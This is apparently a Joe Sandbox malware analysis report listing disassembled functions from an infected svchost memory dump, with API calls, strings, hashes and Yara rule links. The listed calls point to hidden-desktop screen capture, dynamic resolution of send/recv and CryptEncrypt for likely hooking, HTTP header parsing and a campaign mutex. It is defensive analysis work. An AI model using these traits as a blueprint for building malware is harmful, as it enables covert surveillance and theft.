                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1670920773-0
                                                                                                                                                                                                                    • Opcode ID: 108202c0d4279456596ae13d8372c63828c1c486a485ed11bdd8f0e70d218377
                                                                                                                                                                                                                    • Instruction ID: 96d5c744759e76c387bd5157526568cf865ea02f85927ef851269706937036c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 108202c0d4279456596ae13d8372c63828c1c486a485ed11bdd8f0e70d218377
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3731A172E843516BEB225F65AC88F5B77ACEFC0F56F090A19E40B93184DB31E910C6A0
                                                                                                                                                                                                                    Function 02C780B0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132memorythreadwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(?,7622F590,762216B0,00000000), ref: 02C780BF
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 02C780C7
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C780D8
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 02C780E9
                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C78100
                                                                                                                                                                                                                    • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C78142
                                                                                                                                                                                                                    • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C78152
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 02C78155
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 02C7815E
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C781B9
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C781D2
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C781EF
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(?), ref: 02C78224
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                    • API String ID: 188880187-3887548279
                                                                                                                                                                                                                    • Opcode ID: 65efba5e38bc7ffa8d34c9547869be9fddd69222542ae85b0bba9e9c45295b16
                                                                                                                                                                                                                    • Instruction ID: e1d2fbe0d8736019194c9f376290799d48bd3895722b7c8204f9a690c898a7f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65efba5e38bc7ffa8d34c9547869be9fddd69222542ae85b0bba9e9c45295b16
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA415E71E81344AFDB11CFA9D889BDABBF8EF49710F1446A9E509E7280D7705911CBA0
                                                                                                                                                                                                                    Function 02C8F0A0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 98memoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(?,?,00000000,00000000,75AF7390), ref: 02C8F0DD
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C8F0F4
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C8F0FB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8F10B
                                                                                                                                                                                                                    • ReadFile.KERNEL32 ref: 02C8F12C
                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,BEGIN SIGNATURE), ref: 02C8F142
                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,END SIGNATURE), ref: 02C8F14E
                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,75AF7390), ref: 02C8F172
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F185
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8F188
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F195
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8F198
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FileProcess$AllocFreePointerReadSizeValidatememset
                                                                                                                                                                                                                    • String ID: BEGIN SIGNATURE$END SIGNATURE
                                                                                                                                                                                                                    • API String ID: 2165369453-4158457813
                                                                                                                                                                                                                    • Opcode ID: 5cc793cfcd844ed135731521aff2ba7705046535c27c244f156e8f9c38b85ce1
                                                                                                                                                                                                                    • Instruction ID: 205416860f5337fade4d07def29ba387aed30ced77a7123e8de2b8e9bd581d6e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cc793cfcd844ed135731521aff2ba7705046535c27c244f156e8f9c38b85ce1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B331AD71E41355ABE721AF25DC44F6BB7ACEF84B58F008A1DF90487180DB30DA148BB2
                                                                                                                                                                                                                    Function 02C882E0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,7622F550,7622DF10,02C8475B), ref: 02C882F1
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02C88303
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02C88322
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,send), ref: 02C88330
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSASend), ref: 02C8834C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02C88368
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,recv), ref: 02C88384
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                                    • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                                    • API String ID: 1216545827-2206184491
                                                                                                                                                                                                                    • Opcode ID: 009819cbb39ec59092b7244a0fa23995c21bc4da5a30ebe04a12004182c48b34
                                                                                                                                                                                                                    • Instruction ID: 9a52b65efe7a915dc87aac047ecc0af53a9f84a6923bcf0b944caf202d9e69fa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 009819cbb39ec59092b7244a0fa23995c21bc4da5a30ebe04a12004182c48b34
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3010C76BC032A30F92231751C02F6A824E5FC1ECDF968B31B906F25C4DA95E60648B8
                                                                                                                                                                                                                    Function 02C902E0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9030C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C90319
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C9032D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C9033F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C90120,00000000,00000000,00000000), ref: 02C90350
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9035F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90366
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bffd6), ref: 02C9036D
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bffd6,KBP), ref: 02C90387
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C90390
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7f1bffd6$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0#v
                                                                                                                                                                                                                    • API String ID: 4173420962-1310770680
                                                                                                                                                                                                                    • Opcode ID: 2bbf6942b2cc3377f752cab79c1ee771b0b10d9440eb4d92d363200170be55e2
                                                                                                                                                                                                                    • Instruction ID: 2da9133c6d81619bcd978588399cab9ea2d0523d7024d38c1b837b514c6b9bb9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bbf6942b2cc3377f752cab79c1ee771b0b10d9440eb4d92d363200170be55e2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4701F930ECDB95BBFA1267614C0EF1A369C7F44B14F204750F919671C19BF4A90086AB
                                                                                                                                                                                                                    Function 02C796FF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 264synchronizationwindowthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02C7976E
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C78623,00008001,?), ref: 02C79797
                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 02C7979E
                                                                                                                                                                                                                    • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C797B2
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00008001,?), ref: 02C79821
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02C78623,00008001,?), ref: 02C7983A
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 02C798CB
                                                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 02C798E2
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C79929
                                                                                                                                                                                                                    • GetWindowInfo.USER32 ref: 02C799A1
                                                                                                                                                                                                                      • Part of subcall function 02C79030: GetWindowRect.USER32(?,?), ref: 02C79057
                                                                                                                                                                                                                      • Part of subcall function 02C79030: IsRectEmpty.USER32(?), ref: 02C790C6
                                                                                                                                                                                                                      • Part of subcall function 02C79030: GetWindowLongA.USER32(?,000000F0), ref: 02C790D6
                                                                                                                                                                                                                      • Part of subcall function 02C79030: GetParent.USER32(?), ref: 02C790EA
                                                                                                                                                                                                                      • Part of subcall function 02C79030: MapWindowPoints.USER32(00000000,00000000,?,02C79754), ref: 02C790F3
                                                                                                                                                                                                                      • Part of subcall function 02C79030: SetWindowPos.USER32(?,00000000,?,02C79754,00000000,00008001,0000630C,?,02C79754,00000000,00008001,?), ref: 02C79115
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$LongMutexObjectParentRectReleaseSingleWait$EmptyInfoMessagePointsPostProcessThread
                                                                                                                                                                                                                    • String ID: <$P0#v
                                                                                                                                                                                                                    • API String ID: 4123185898-512927467
                                                                                                                                                                                                                    • Opcode ID: 71a270c82cb22c150ca72a1b1f6a01f2ab14ba3d5e97254e997ef960a8183707
                                                                                                                                                                                                                    • Instruction ID: 4bcd2f6e1dc22edba24d600672e87dd96ef4d6448a9f883a8d935158106c1083
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71a270c82cb22c150ca72a1b1f6a01f2ab14ba3d5e97254e997ef960a8183707
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C911531684341ABD3259F24CC89FAB7BA9AFC5714F044A2DF9668B2D1C7B4C544CBA1
                                                                                                                                                                                                                    Function 02C902F8 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 45sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9030C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C90319
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C9032D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C9033F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C90120,00000000,00000000,00000000), ref: 02C90350
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9035F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90366
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bffd6), ref: 02C9036D
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bffd6,KBP), ref: 02C90387
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C90390
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7f1bffd6$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0#v
                                                                                                                                                                                                                    • API String ID: 4173420962-1310770680
                                                                                                                                                                                                                    • Opcode ID: 88a526ad00a8721c1e6a2a5c837008470dea0a3c5b96a610d510109e05e985dd
                                                                                                                                                                                                                    • Instruction ID: 2fbf6114131304eca77c357c6b4215e969722fbf4bac548efdacd2700ee22b59
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88a526ad00a8721c1e6a2a5c837008470dea0a3c5b96a610d510109e05e985dd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B301D130AC9795BBFA222B304C0EF4E369CBF45B19F104750F91A661C0DBB499018AAB
                                                                                                                                                                                                                    Function 02C7DA80 Relevance: 21.4, APIs: 7, Strings: 7, Instructions: 411COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7DA94
                                                                                                                                                                                                                    • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C7E8FF,?,?), ref: 02C7DAF5
                                                                                                                                                                                                                    • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02C7E8FF,?,?), ref: 02C7DBB1
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?,Host,?,?), ref: 02C7DCF3
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?,Host,?,?), ref: 02C7DDAE
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,02C7E8FF,?,?), ref: 02C7DDBF
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,Host,?,?,?,00000000,?,?,?,00000000), ref: 02C7DDF1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                                    • API String ID: 438689982-3158524741
                                                                                                                                                                                                                    • Opcode ID: 8d59738fe5088c2eaf57886d77d28275053c8d2c12aedd217a0793f37a8cd660
                                                                                                                                                                                                                    • Instruction ID: dd3732c7711ec3d45edace044122e002dbadd5e24b6794fc6baae500f18ee1ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d59738fe5088c2eaf57886d77d28275053c8d2c12aedd217a0793f37a8cd660
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85D12A76E0025A9BDF25CE68C880BEEBBB5FF85314F144169D857AB240D730DA41CBA5
                                                                                                                                                                                                                    Function 02C9B080 Relevance: 21.2, APIs: 14, Instructions: 212COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$closesocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3865430558-0
                                                                                                                                                                                                                    • Opcode ID: 910a31fd0c6bd9dc90c70c11b12ace9fc46aebbc3afe7f0e71b855cb4b104ca5
                                                                                                                                                                                                                    • Instruction ID: bf6d14dd3a9724a07df7cd090e182fe84bab0acc79f7ff47ea8ec59b600bc34a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 910a31fd0c6bd9dc90c70c11b12ace9fc46aebbc3afe7f0e71b855cb4b104ca5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC813EB0A00A12AFCB14CF28E888A56B7E4FF48708F184669D81ADB341D735FE55CBD5
                                                                                                                                                                                                                    Function 02C7F6A0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorynetworkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: memset.MSVCRT ref: 02C7F114
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02C7F12C
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: HeapValidate.KERNEL32(00000000), ref: 02C7F12F
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: GetProcessHeap.KERNEL32(00000000,?), ref: 02C7F13C
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: HeapFree.KERNEL32(00000000), ref: 02C7F13F
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: InternetQueryOptionA.WININET(?,00000022,00000000,-02CBD804), ref: 02C7F15C
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: GetProcessHeap.KERNEL32(00000008,00000014), ref: 02C7F179
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: HeapAlloc.KERNEL32(00000000), ref: 02C7F180
                                                                                                                                                                                                                      • Part of subcall function 02C7F0C0: memset.MSVCRT ref: 02C7F190
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6E2
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6E9
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6F6
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F6FD
                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(?,80000023,?,00000018,00000000), ref: 02C7F716
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F754
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F75B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F768
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C7FD9B,?,?,?,?,?,?), ref: 02C7F76F
                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 02C7F7A5
                                                                                                                                                                                                                      • Part of subcall function 02C7F210: InternetQueryOptionA.WININET(?,00000009,?,?), ref: 02C7F233
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$Query$FreeValidate$HttpInfoInternetOptionmemset$Alloc
                                                                                                                                                                                                                    • String ID: POST$T
                                                                                                                                                                                                                    • API String ID: 4198387326-1208759463
                                                                                                                                                                                                                    • Opcode ID: 99338229d96ef8bf0f3b4d3909b2820c6cba6b496dd30af06a24439a9daa011f
                                                                                                                                                                                                                    • Instruction ID: bda962978ceaa05048a9369c1bf0b2edf011d2575adf7fbfcb0148bc20942b15
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99338229d96ef8bf0f3b4d3909b2820c6cba6b496dd30af06a24439a9daa011f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A41E471A40345ABD7328FA4DCC8FA777B8AF88715F008A4DE64687980D7B0E644DBA1
                                                                                                                                                                                                                    Function 02C78240 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 120filesynchronizationmemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(?,76233050,762330D0,76233080), ref: 02C78280
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C78294
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7829F
                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02C782C7
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C782E4
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C782F5
                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C78315
                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C7832C
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C7836C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C783B4
